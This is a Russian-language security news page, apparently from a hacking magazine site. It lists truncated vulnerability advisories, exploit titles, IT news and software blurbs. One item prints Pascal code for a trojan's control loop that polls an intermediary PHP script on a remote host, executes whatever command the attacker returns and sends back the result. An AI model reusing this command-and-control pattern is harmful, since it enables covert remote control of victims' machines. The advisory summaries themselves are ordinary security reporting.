Отказ в обслуживании в Microsoft Front Page
Уязвимость позволяет удаленному пользователю аварийно завершить работу приложения. Удаленный пользователь может создать HTML…
SQL-инъекция в Simple Machines Forum
Уязвимость позволяет удаленному пользователю выполнить произвольные SQL команды в базе данных приложения. Уязвимость существ…
HTTP Request Smuggling атака в различных proxy и web серверах
Уязвимость позволяет удаленному пользователю произвести HTTP Request Smuggling атаку (атаку со скрытым HTTP запросом), и отр…
Отказ в обслуживании в браузере Netscape
Уязвимость позволяет удаленному пользователю вызвать аварийное завершение работы браузера. Уязвимость существует при обработ…
DoS в аудио системе NetBSD
Уязвимость позволяет локальному пользователю вызвать отказ в обслуживании системы. Локальный пользователь может вызвать функ…
Обход ограничений безопасности в Prevx Pro
Обнаруженная уязвимость позволяет локальному пользователю обойти механизм защиты от изменения данных и подделать сообщения о…
Выполнение произвольных команд в Community Link Pro
Уязвимость позволяет удаленному пользователю выполнить произвольные команды на целевой системе. Уязвимость существует в сцен…
Небезопасное хранение закрытого ключа в SSH Tectia Server
Уязвимость позволяет локальному пользователю заполучить получить доступ к зарытому ключу. Уязвимость существует из-за некорр…
Просто DJ
Кручу-верчу.
Пингвинчик
Просто потыкай.
Digest аутентификация в PHP
Ограничение доступа к какой-либо области сайта обычно выглядит однообразно: каждому пользователю выдается логин и пароль или он сам их выбирает, и для входа в защищенную часть сайта их нужно ввести. С технической же точки зрения для проверки пароля используются разные методы
mp3DirectCut 2.01
омпактная утилита для прямого редактирования MP3-файлов: позволяет обрезать тишину в начале и/или конце файла, нормализировать звук, а также плавно убирать его в конце композиции, обьединять файлы, редактировать ID3-тэги и записывать Mp3 непосредственно на диск - без декомпрессии в PCM-формат ( поддерживаются кодеки ACM и LAME).
Взломанные сайты:04.07.2005
Взломан:
Sun не помогает Open Source, а противостоит ему
Джонатан Шварц, президент компании Sun Microsystems, на проходившей на этой неделе конференции JavaOne заявил, что бесплатно…
Motorola готовит Linux-телефоны для массового потребления
Компания Motorola на этой неделе анонсировала новый шаг в программе расширения использования открытой ОС Linux в своих мобил…
В Китае открылась клиника для интернет-зависимых
В Китае открылась первая клиника для лечения жителей этой страны, страдающих интернет-зависимостью. Она создана как подразде…
Биометрические паспорта надо будет апгрейдить
Глава британской паспортной службы (UKPS) вынужден был признать, что биометрические паспорта, преподносимые в качестве панац…
США сохранят контроль над Интернетом
Вопреки прежним планам и требованиям международного сообщества, США не собираются в обозримом будущем передавать функции кон…
Доходы Red Hat выросли в полтора раза
Компания Red Hat обнародовала результаты первого квартала 2005 финансового года, завершившегося 31 мая. Общая прибыль компан…
ФБР провело операцию по захвату пиратской верхушки
Министерство юстиции США объявило о масштабной международной акции против пиратских групп, несущих ответственность за нелега…
DoS в cabinet.dll и утилите makecab.exe
В Библиотеке сжатия cabinet.dll и в утилите makecab.exe обнаружена уязвимость. Во время сжатия файла с любым именем и содерж…
Обход фильтрации ipfw в FreeBSD
Уязвимость позволяет удаленному пользователю обойти фильтрацию пакетов. Уязвимость существует при включенной опции PREEMPTIO…
Отказ в обслуживании в реализации TCP стека во FreeBSD
Обнаруженные уязвимости позволяют удаленному пользователю вызвать отказ в обслуживании.
Отказ в обслуживании в Clam AntiVirus
Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании системы.
Обход аутентификации в Cisco IOS RADIUS
Уязвимость позволят удаленному пользователю обойти аутентификацию и получить неавторизованный доступ к ресурсам сети. Уязвим…
Удаленная перезагрузка устройств с Symbian OS (эксплоит)
Мобильные устройства на основе Symbian OS с поддержкой Bluetooth могут быть удаленно перезагружены простой передачей специал…
Управление трояном через скрипт-посредник №2
Код, реализующий это, выглядит так: // сначала запрос пустой request:=''; // цикл работы трояна while true do begin // отсылаем скрипту запрос if (SendStringViaHTTP('127.0.0.1', 'test1.ru', 80, '/index.php', request, answer)<>0) then begin // если отослать не удалось - ждём минуту и крутим следующую итерацию sleep(1000*SEC); continue; end; // если отослать удалось - проверим answer if (answer='') then begin // команд от хакера нет - очистим reques, // ждём минуту и крутим следующую итерацию request:=''; sleep(1000*SEC); continue; end; // если управление дошло сюда - в answer у нас команда хакера // выполняем команду request:=DoCommand(answer); end; Здесь answer и request у нас глобальные переменные типа AnsiString
Выполнение произвольного PHP сценария в phpBB (эксплоит)
Уязвимость в viewtopic.php в версиях до 2.0.15.
Последняя ревизия Windows 2000
Корпорация Microsoft выпустила пакет обновлений Update Rollup для операционной системы Windows 2000.
Япония будет бороться с опасной информацией в интернете
Япония намерена вести борьбу с опасной информацией интернете. К информации, которой не место в онлайне, относятся, например,…
Автор DeCSS снова с утилитой
Йон Лех Йохансен, автор программы DeCSS для обхода защиты от копирования DVD-дисков, выложил на своем веб-сайте "патч", поср…
HTTP Request Smuggling атака в web сервере Apache
Уязвимость позволяет удаленному пользователю произвести HTTP Request Smuggling атаку (атаку со скрытым HTTP запросом) на web…
Переполнение буфера в Microsoft Internet Explorer в библиотеке javaprxy.dll
Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании или выполнить произвольный код на целевой системе.…
Удаленное выполнение PHP кода в XML-RPC for PHP
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость в XML-RPC fo…
Отказ в обслуживании в Blue Coat Systems ProxySG
Уязвимость позволяет удаленному пользователю вызвать отказ в обслуживании приложения. Уязвимость существует в реализации TCP…
PHP-инклюдинг в Pavsta Auto Site
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует п…
Выполнение произвольного PHP сценария в phpBB в коде highlighting
Уязвимость позволяет удаленному пользователю выполнить произвольный PHP сценарий на целевой системе. Уязвимость существует и…
Stringer 2.1 beta
Большинство DOS-программ и некоторые программы под WINDOWS3.
Повышение привилегий в Adobe Acrobat/Adobe Reader Updater для MAC OS
Программа: Adobe Reader и Adobe Acrobat 7.0 и 7.1 для MAC OS
Взломанные сайты:30.06.2005
Взломан:
Бумажный спецвыпуск
Материалы для подписчиков
Вопросы по материалам и подписке: support@glc.ru
Отдел рекламы и спецпроектов: yakovleva.a@glc.ru
Контент 18+
Сайт защищен Qrator —
самой забойной защитой от DDoS в мире
Отдел рекламы и спецпроектов: yakovleva.a@glc.ru
Контент 18+
Сайт защищен Qrator —самой забойной защитой от DDoS в мире